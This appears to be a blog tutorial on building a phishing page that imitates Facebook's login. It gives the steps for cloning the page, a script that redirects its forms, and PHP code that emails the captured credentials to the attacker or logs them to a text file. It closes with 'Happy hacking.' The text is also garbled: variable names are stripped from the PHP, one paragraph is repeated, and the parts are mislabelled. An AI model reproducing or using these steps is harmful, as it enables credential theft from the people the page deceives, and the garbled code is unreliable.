A phishing site is usually made up of 1 to 3 files that are usually scripted in HTML or PHP. The first file is usually a HTML login page with a small script inside that tells the second file to record whatever they type in. The process file is usually coded in PHP, the process file writes to the third file, which is usually the log file, which is usually in a txt format.
Go to a login page, any page at all that you want to make into a fake login, lets use Facebook for example. Go to "www.facebook.com" then on your web browser on the menu bar go to "File>>Save Page As" save it in a folder on your desktop called "Fake Login" (please make sure your not logged in when you save the page) then go to the file, and where you see the file you saved rename it, "index.html".
Go to a login page, any page at all that you want to make into a fake login, lets use Facebook for example. Go to "www.facebook.com" then on your web browser on the menu bar go to "File>>Save Page As" save it in a folder on your desktop called "Fake Login" (please make sure your not logged in when you save the page) then go to the file, and where you see the file you saved rename it, "index.html".
Now there are two ways to write up the process file.
Part 1: First one is where you get the login mailed to you.
Part 2: Second is where your login gets recorded into a text document.
Part 1
Right click index.html and select the option edit, than add the following code to the bottom.
Code:
<script>
var x;for(x in document.forms){void(document.forms[x].action="process.php")};
</script>
Than save. Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and than copy and paste the following code inside.
Code:
<?php
= "POST DATAn---------------------------------n";
function log(, ){ global ; .= ." = ".."n"; }
array_walk(Array, "log");
mail("you@mail.com", "Fake Login", );
header("Location: http://www.website.com");
?>
Now we have to do a bit of editing, on the code above, on the 5th line of code where it says "you@mail.com" replace that with your own email for example "prashantsavior@gmail.com". Now on the 6th line of code where it says "http://www.website.com" replace that with a address that you want your user to be forwarded to after they login to your login file, for example "www.facebook.com". Now save that file as "process.php".
Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and then copy and paste the following code inside.
Code:
<?php
header("Location: "link");
= fopen("logs.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
fclose();
exit;
?>
Save it as process.php
Part 2:
Will be uploaded soon. Stay tuned.
Happy hacking.
No comments:
Post a Comment